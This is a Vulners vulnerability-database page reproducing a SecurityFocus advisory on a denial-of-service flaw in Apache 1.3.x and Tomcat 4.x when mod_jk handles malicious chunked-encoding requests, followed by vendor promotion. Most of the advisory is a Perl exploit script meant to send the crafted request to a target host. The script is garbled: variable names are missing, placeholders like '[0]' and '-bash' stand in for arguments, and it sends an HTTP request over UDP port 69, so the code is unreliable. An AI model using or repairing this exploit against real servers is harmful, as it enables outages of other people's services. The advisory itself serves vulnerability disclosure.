Vulners
Lucene search
Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
source: http://www.securityfocus.com/bid/6320/info
Apache Webserver and Tomcat are HTTP servers maintained and distributed by the Apache project. Apache Webserver and Tomcat are available for the Unix, Linux, and Microsoft Windows platforms.
It has been reported that a denial of service exists in Apache Webserver and Tomcat when mod_jk is used. Due to design problems in the module, a user submitting malicious requests to the Apache Webserver may cause desynchronization between Apache and Tomcat. This could be done through malicious chunked encoding requests.
#!/usr/bin/perl -w
use IO::Socket;
= "Apache 1.3.x, Tomcat 4.x Server, mod_jk 1.2 using Apache Jserv
Protocol 1.3";
unless (@ARGV == 1) {
print "\n By Sapient2003\n";
die "usage: -bash <host to exploit>\n";
}
print "\n By Sapient2003\n";
= "GET / HTTP/1.0\nHost: [0]\nTransfer-ENcoding:
Chunked\n53636f7474";
= IO::Socket::INET->new(
PeerAddr => [0],
PeerPort => 69,
Proto => "udp",
) or die "Can't find host [0]\n";
print ;
print "Attempted to exploit [0]\n";
close();
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1